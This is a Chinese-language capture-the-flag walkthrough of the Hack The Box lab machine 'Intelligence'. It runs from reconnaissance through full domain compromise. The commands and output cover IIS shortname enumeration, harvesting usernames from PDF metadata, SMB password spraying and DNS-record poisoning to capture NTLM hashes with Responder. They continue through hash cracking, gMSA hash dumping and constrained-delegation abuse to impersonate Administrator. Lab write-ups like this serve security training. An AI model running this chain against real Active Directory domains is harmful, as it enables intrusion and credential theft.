端口扫描

$ rustscan --accessible -a 10.129.85.15 --range 1-65535 --ulimit 5000 -- -sT -A -n -oN ports -Pn
PORT      STATE SERVICE       REASON  VERSION
53/tcp    open  domain        syn-ack Simple DNS Plus
80/tcp    open  http          syn-ack Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp    open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2021-07-04 16:20:31Z)
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after:  2022-04-19T00:43:16
| MD5:   7767 9533 67fb d65d 6065 dff7 7ad8 3e88
| SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
|_ssl-date: 2021-07-04T16:22:03+00:00; +6h59m55s from scanner time.
445/tcp   open  microsoft-ds? syn-ack
464/tcp   open  kpasswd5?     syn-ack
593/tcp   open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after:  2022-04-19T00:43:16
| MD5:   7767 9533 67fb d65d 6065 dff7 7ad8 3e88
| SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
|_ssl-date: 2021-07-04T16:22:03+00:00; +6h59m56s from scanner time.
3268/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after:  2022-04-19T00:43:16
| MD5:   7767 9533 67fb d65d 6065 dff7 7ad8 3e88
| SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
|_ssl-date: 2021-07-04T16:22:05+00:00; +6h59m56s from scanner time.
3269/tcp  open  ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after:  2022-04-19T00:43:16
| MD5:   7767 9533 67fb d65d 6065 dff7 7ad8 3e88
| SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
|_ssl-date: 2021-07-04T16:22:03+00:00; +6h59m56s from scanner time.
5985/tcp  open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack .NET Message Framing
49667/tcp open  msrpc         syn-ack Microsoft Windows RPC
49677/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc         syn-ack Microsoft Windows RPC
49694/tcp open  msrpc         syn-ack Microsoft Windows RPC
49700/tcp open  msrpc         syn-ack Microsoft Windows RPC
63408/tcp open  msrpc         syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

User Tiffany.Molina

通过Microsoft IIS Tilde漏洞用shortname泄露文件名

$ rustbuster tilde -u http://10.129.85.15 -X OPTIONS
⠁ [00:00:00]
Directory       docume~1
File            index~1.htm
  [00:00:16] 591 requests done | req/s: 36 | queued reqs: 0

访问documents目录得到403错误

网站首页有两个文档链接

http://10.129.85.15/documents/2020-01-01-upload.pdf

http://10.129.85.15/documents/2020-12-15-upload.pdf

将这两个PDF文件下载到本地，使用exiftool发现两个用户名Jose.Williams和William.Lee

$ exiftool 2020-12-15-upload.pdf
ExifTool Version Number         : 12.16
File Name                       : 2020-12-15-upload.pdf
Directory                       : .
File Size                       : 27 KiB
File Modification Date/Time     : 2021:04:01 13:00:00-04:00
File Access Date/Time           : 2021:07:04 05:31:53-04:00
File Inode Change Date/Time     : 2021:07:04 05:31:53-04:00
File Permissions                : rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.5
Linearized                      : No
Page Count                      : 1
Creator                         : Jose.Williams

$ exiftool 2020-01-01-upload.pdf
ExifTool Version Number         : 12.16
File Name                       : 2020-01-01-upload.pdf
Directory                       : .
File Size                       : 26 KiB
File Modification Date/Time     : 2021:04:01 13:00:00-04:00
File Access Date/Time           : 2021:07:04 05:32:03-04:00
File Inode Change Date/Time     : 2021:07:04 05:32:03-04:00
File Permissions                : rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.5
Linearized                      : No
Page Count                      : 1
Creator                         : William.Lee

另外，还在/documents下找到许多shortname，大多为PDF文件，重点关注文件名为日期格式的文件

File            2021-0~1.pdf
File            2020-1~1.pdf
File            2020-0~1.pdf
File            2021-0~2.pdf
File            2021-0~3.pdf
File            2021-0~4.pdf
File            2020-1~3.pdf
File            2020-1~2.pdf
File            2020-1~4.pdf
File            2020-0~2.pdf
File            2020-0~3.pdf
File            2020-0~4.pdf

根据已有的两个PDF文件名格式，编写一个python脚本枚举剩下的以日期YYYY-MM-DD-upload.pdf为格式的PDF文件

import requests

for y in range(2020, 2022):
    for m in range(1, 13):
        for d in range(1, 32):
            url = f'http://intelligence.htb/documents/{y}-{m:02}-{d:02}-upload.pdf'
            if requests.get(url).status_code == 200:
                print(url)

脚本运行结束后，找到了99个PDF，保存这些PDF的URL到pdf_urls，将这些PDF全部下载到本地

1 2	$ python3 pdf_enum.py > pdf_urls $ wget -i pdf_urls

执行以下命令获得这些PDF的作者或创建者的用户名

$ exiftool * | grep -i -E '(creator|author) [^T]' | awk '{print $3}' | unique usernames
$ cat usernames
William.Lee
Scott.Scott
Jason.Wright
Veronica.Patel
Jennifer.Thomas
Danny.Matthews
David.Reed
Stephanie.Young
Daniel.Shelton
Jose.Williams
John.Coleman
Brian.Morris
Thomas.Valenzuela
Travis.Evans
Samuel.Richardson
Richard.Williams
David.Mcbride
Anita.Roberts
Brian.Baker
Kelly.Long
Nicole.Brock
Kaitlyn.Zimmerman
Jason.Patterson
Darryl.Harris
David.Wilson
Teresa.Williamson
Ian.Duncan
Jessica.Moody
Tiffany.Molina
Thomas.Hall

执行impacket的GetNPUsers.py看看哪些用户名设置了UF_DONT_REQUIRE_PREAUTH

$ python3 ~/tools/impacket/examples/GetNPUsers.py -dc-ip 10.129.85.15 -no-pass -usersfile usernames intelligence/
[-] User William.Lee doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Scott.Scott doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jason.Wright doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Veronica.Patel doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jennifer.Thomas doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Danny.Matthews doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User David.Reed doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Stephanie.Young doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Daniel.Shelton doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jose.Williams doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User John.Coleman doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Brian.Morris doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Thomas.Valenzuela doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Travis.Evans doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Samuel.Richardson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Richard.Williams doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User David.Mcbride doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Anita.Roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Brian.Baker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Kelly.Long doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Nicole.Brock doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Kaitlyn.Zimmerman doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jason.Patterson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Darryl.Harris doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User David.Wilson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Teresa.Williamson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Ian.Duncan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jessica.Moody doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Tiffany.Molina doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Thomas.Hall doesn't have UF_DONT_REQUIRE_PREAUTH set

没有用户设置UF_DONT_REQUIRE_PREAUTH

让我们将PDF转换为文本文件，在这些文档内容中查找有用信息

首先安装poppler-utils

1	$ sudo apt install poppler-utils

执行以下脚本，将当前目录下的PDF转换为TXT存放到txt目录下

#!/bin/bash
mkdir txt
for pdf in *.pdf; do
    pdftotext -layout $pdf txt/$pdf.txt
done

进入txt目录，执行如下命令，找到2020-06-04-upload.pdf.txt中包含default password

1
2
3

$ grep password -R
2020-06-04-upload.pdf.txt:Please login using your username and the default password of:
2020-06-04-upload.pdf.txt:After logging in please change your password as soon as possible.

查看2020-06-04-upload.pdf.txt的内容

New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876

After logging in please change your password as soon as possible.

我们得到密码NewIntelligenceCorpUser9876

使用msfconsole的smb_login模块枚举该密码适用于哪些用户

msf6 auxiliary(scanner/smb/smb_login) > set RHOSTS 10.129.85.15
RHOSTS => 10.129.85.15
msf6 auxiliary(scanner/smb/smb_login) > set USER_FILE documents/usernames
USER_FILE => documents/usernames
msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE documents/password
PASS_FILE => documents/password
msf6 auxiliary(scanner/smb/smb_login) > set stop_on_success true
stop_on_success => true

msf6 auxiliary(scanner/smb/smb_login) > run

[*] 10.129.85.15:445      - 10.129.85.15:445 - Starting SMB login bruteforce
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\William.Lee:NewIntelligenceCorpUser9876',
[!] 10.129.85.15:445      - No active DB -- Credential data will not be saved!
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\Scott.Scott:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\Jason.Wright:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\Veronica.Patel:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\Jennifer.Thomas:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\Danny.Matthews:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\David.Reed:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\Stephanie.Young:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\Daniel.Shelton:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\Jose.Williams:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\John.Coleman:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\Brian.Morris:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\Thomas.Valenzuela:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\Travis.Evans:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\Samuel.Richardson:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\Richard.Williams:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\David.Mcbride:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\Anita.Roberts:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\Brian.Baker:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\Kelly.Long:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\Nicole.Brock:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\Jason.Patterson:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\Darryl.Harris:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\David.Wilson:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\Teresa.Williamson:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\Ian.Duncan:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445      - 10.129.85.15:445 - Failed: '.\Jessica.Moody:NewIntelligenceCorpUser9876',
[+] 10.129.85.15:445      - 10.129.85.15:445 - Success: '.\Tiffany.Molina:NewIntelligenceCorpUser9876'
[*] 10.129.85.15:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

找到凭据.\Tiffany.Molina:NewIntelligenceCorpUser9876，使用该凭据访问SMB

$ smbmap -H 10.129.85.15 -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876'
[+] IP: 10.129.85.15:445        Name: intelligence.htb
        Disk                    Permissions     Comment
        ----                    -----------     -------
        ADMIN$                  NO ACCESS       Remote Admin
        C$                      NO ACCESS       Default share
        IPC$                    READ ONLY       Remote IPC
        IT                      READ ONLY
        NETLOGON                READ ONLY       Logon server share
        SYSVOL                  READ ONLY       Logon server share
        Users                   READ ONLY

Users共享在/Users目录下

$ smbclient //10.129.85.15/Users -U Tiffany.Molina
Enter WORKGROUP\Tiffany.Molina's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sun Apr 18 21:20:26 2021
  ..                                 DR        0  Sun Apr 18 21:20:26 2021
  Administrator                       D        0  Sun Apr 18 20:18:39 2021
  All Users                       DHSrn        0  Sat Sep 15 03:21:46 2018
  Default                           DHR        0  Sun Apr 18 22:17:40 2021
  Default User                    DHSrn        0  Sat Sep 15 03:21:46 2018
  desktop.ini                       AHS      174  Sat Sep 15 03:11:27 2018
  Public                             DR        0  Sun Apr 18 20:18:39 2021
  Ted.Graves                          D        0  Sun Apr 18 21:20:26 2021
  Tiffany.Molina                      D        0  Sun Apr 18 20:51:46 2021

在\Tiffany.Molina\Desktop目录下找到user.txt，除此之外没有在Users共享中找到其他有用信息

smb: \Tiffany.Molina\Desktop\> ls
  .                                  DR        0  Sun Apr 18 20:51:46 2021
  ..                                 DR        0  Sun Apr 18 20:51:46 2021
  user.txt                           AR       34  Sun Jul  4 03:09:54 2021
smb: \Tiffany.Molina\Desktop\> get user.txt

User Ted.Graves

NETLOGON共享为空，SYSVOL没有包含什么有用的信息

IT共享包含一个downdetector.ps1文件

# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if(.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}

这个脚本每5分钟由计划任务运行一次

脚本以LDAP查询DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb，逐个调用Invoke-WebRequest请求结果中以web开头的名称

Invoke-WebRequest带有-UseDefaultCredentials参数，该参数会在服务要求认证时传递默认凭据（这里是Ted.Graves的凭据）

downdetector.ps1中包含用户名Ted.Graves，用这个用户名在PDF文档中找到关于Ted的信息，但似乎没啥用

$ grep -i ted -R
2020-12-30-upload.pdf.txt:There has recently been some outages on our web servers. Ted has gotten a

$ cat 2020-12-30-upload.pdf.txt
Internal IT Update
There has recently been some outages on our web servers. Ted has gotten a
script in place to help notify us if this happens again.
Also, after discussion following our recent security audit we are in the process
of locking down our service accounts.

我们以Tiffany.Molina@intelligence.htb:NewIntelligenceCorpUser9876使用ldapsearch对LDAP进行相同查询

$ ldapsearch -H ldap://dc.intelligence.htb -x -W -D 'Tiffany.Molina@intelligence.htb' -b 'DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb' '(name=web*)'
Enter LDAP Password:
# extended LDIF
#
# LDAPv3
# base <DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb> with scope subtree
# filter: (name=web*)
# requesting: ALL
#

# web1, intelligence.htb, MicrosoftDNS, DomainDnsZones.intelligence.htb
dn: DC=web1,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intellige
 nce,DC=htb
objectClass: top
objectClass: dnsNode
distinguishedName: DC=web1,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZon
 es,DC=intelligence,DC=htb
instanceType: 4
whenCreated: 20210630005218.0Z
whenChanged: 20210630010959.0Z
uSNCreated: 106733
uSNChanged: 106745
showInAdvancedViewOnly: TRUE
name: web1
objectGUID:: lgDIMYr6GkmUtbsrvMeJoA==
dnsRecord:: CAAAAAUAAABcAAAAAAAAAAAAAAAAAAAAv4FzpUxt1wE=
objectCategory: CN=Dns-Node,CN=Schema,CN=Configuration,DC=intelligence,DC=htb
dSCorePropagationData: 16010101000000.0Z
dNSTombstoned: TRUE
dc: web1

# search result
search: 2
result: 0 Success

此外，还可以修改DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb条目及其子条目

我们可以修改DC=web1,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intellige nce,DC=htb的dnsRecord属性，使DNS解析web1到我们的IP地址（或者创建新的name以web开头的DNS-Node条目）

之后请求发送到我们的IP地址，即可获得Invoke-WebRequest传递的凭据（前提是要运行相关服务捕获凭据）

这里使用Apache Directory Studio操作LDAP（对于添加/修改LDAP的DNS记录，也可以使用kebrelayx的dnstool.py工具，但这里使用ApacheDirectoryStudio手动完成）。首先创建一个LDAP Connection

运行以下脚本，生成DNSRecord数据

f = open('payload-hex', 'wb')
# payload最后4字节修改为自己的IP地址的16进制，此例使用10.10.14.50，对应'\x0a\x0a\x0e\x2a'
payload = \
b'\x04\x00\x01\x00\x05\xf0\x00\x00'\
b'\xb7\x00\x00\x00\x00\x00\x04\xb0'\
b'\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x0a\x0a\x0e\x2a'
f.write(payload)

Payload含义参考

[MS-DNSP]: dnsRecord

修改DC=web1,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb的DNSRecord属性，双击dnsRecord并导入生成的payload-hex文件，再修改dNSTombstoned属性值为FALSE

然后运行responser，等待目标主机上的脚本运行

1	$ sudo responder -I tun0 -A

一段时间后得到Ted.Graves的Net-NTLMv2 Hash

[+] Listening for events...
[HTTP] NTLMv2 Client   : 10.129.85.15
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash     : Ted.Graves::intelligence:8fb39512d1ce1d00:E0E996BA205CA2FB01F3C33296BBFD14:01010000000000004AAF1C822E71D701EC9CED2BDA87E56C000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C00080030003000000000000000000000000020000089B1D628877382CD40353F0B19B428BAE41BA85C499669A9503F6951FA39C36E0A001000000000000000000000000000000000000900340048005400540050002F0077006500620031002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
[*] Skipping previously captured hash for intelligence\Ted.Graves

使用john破解得到Ted.Graves的密码为Mr.Teddy

$ john ted.graves.hashes --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Mr.Teddy         (Ted.Graves)
1g 0:00:00:13 DONE (2021-07-04 13:10) 0.07570g/s 818734p/s 818734c/s 818734C/s Mrz.deltasigma..Morgant1
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

Root

用Ted.Graves:Mr.Teddy访问SMB各共享没有什么发现

通过LDAP获得了如下Group Managed Service Account

$ ldapsearch -H ldap://dc.intelligence.htb -x -W -D 'Ted.Graves@intelligence.htb' -b 'CN=Managed Service Accounts,DC=intelligence,DC=htb'

# svc_int, Managed Service Accounts, intelligence.htb
dn: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
objectClass: computer
objectClass: msDS-GroupManagedServiceAccount
cn: svc_int
distinguishedName: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb
instanceType: 4
whenCreated: 20210419004958.0Z
whenChanged: 20210630005622.0Z
uSNCreated: 12846
uSNChanged: 106739
name: svc_int
objectGUID:: eaCA8SbzskmEoTSCQgjWQg==
userAccountControl: 16781312
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 132694881825534026
localPolicyFlags: 0
pwdLastSet: 132694880879752841
primaryGroupID: 515
objectSid:: AQUAAAAAAAUVAAAARobx+nQXDcpGY+TMeAQAAA==
accountExpires: 9223372036854775807
logonCount: 1
sAMAccountName: svc_int$
sAMAccountType: 805306369
dNSHostName: svc_int.intelligence.htb
objectCategory: CN=ms-DS-Group-Managed-Service-Account,CN=Schema,CN=Configuration,DC=intelligence,DC=htb
isCriticalSystemObject: FALSE
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132694881825534026
msDS-AllowedToDelegateTo: WWW/dc.intelligence.htb
msDS-SupportedEncryptionTypes: 28
msDS-ManagedPasswordId:: AQAAAEtEU0sCAAAAZwEAAB0AAAAYAAAAWa6dT0SPVr+SpfQILta2EQAAAAAiAAAAIgAAAGkAbgB0AGUAbABsAGkAZwBlAG4AYwBlAC4AaAB0AGIAAABpAG4AdABlAGwAbABpAGcAZQBuAGMAZQAuAGgAdABiAAAA
msDS-ManagedPasswordPreviousId:: AQAAAEtEU0sCAAAAZwEAABsAAAAQAAAAWa6dT0SPVr+SpfQILta2EQAAAAAiAAAAIgAAAGkAbgB0AGUAbABsAGkAZwBlAG4AYwBlAC4AaAB0AGIAAABpAG4AdABlAGwAbABpAGcAZQBuAGMAZQAuAGgAdABiAAAA
msDS-ManagedPasswordInterval: 30
msDS-GroupMSAMembership:: AQAEgBQAAAAAAAAAAAAAACQAAAABAgAAAAAABSAAAAAgAgAABABQAAIAAAAAACQA/wEPAAEFAAAAAAAFFQAAAEaG8fp0Fw3KRmPkzOgDAAAAACQA/wEPAAEFAAAAAAAFFQAAAEaG8fp0Fw3KRmPkzHYEAAA=

使用gMSADumper.py获取svc_int$的NT Hash

1 2	$ python3 gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d 'intelligence.htb' svc_int$:::d64b83fe606e6d3005e20ce0ee932fe2

该脚本通过LDAP读取CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb条目的msDS-ManagedPassword属性获取svc_int$的MSDS-MANAGEDPASSWORD_BLOB，将其解析为NT Hash后输出

以下是msDS-ManagedPassword属性的描述

gMSA is short for group managed service accounts in Active Directory. gMSA accounts have their passwords stored in a LDAP property called msDS-ManagedPassword which automatically get resets by the DC’s every 30 days, are retrievable by authorized administrators and by the servers who they are installed on. msDS-ManagedPassword is an encrypted data blob called MSDS-MANAGEDPASSWORD_BLOB and it’s only retrievable when the connection is secured, LDAPS or when the authentication type is ‘Sealing & Secure’ for an example. —— https://cube0x0.github.io/Relaying-for-gMSA/

svc_int$还具有msDS-AllowedToDelegateTo: WWW/dc.intelligence.htb属性，也就是说该服务账号可能有约束性委派，通过S4U2self Extension可以从KDC获取信任的SPN（WWW/dc.intelligence.htb）主机上用户的ST（Service Ticket）

我们可以通过impacket的getST.py获取Administrator的ST

$ python3 ~/tools/impacket/examples/getST.py -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for user
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache

最后，使用impacket的wmiexec.py在目标主机执行命令读取root.txt

$ export KRB5CCNAME=Administrator.ccache
$ python3 ~/tools/impacket/examples/wmiexec.py -k -no-pass intelligence.htb/Administrator@dc.intelligence.htb 'type c:\users\administrator\desktop\root.txt'
Impacket v0.9.23.dev1+20210315.121412.a16198c3 - Copyright 2020 SecureAuth Corporation
[*] SMBv3.0 dialect used
50d8d8b0edcb7b8e79c417e864b473b3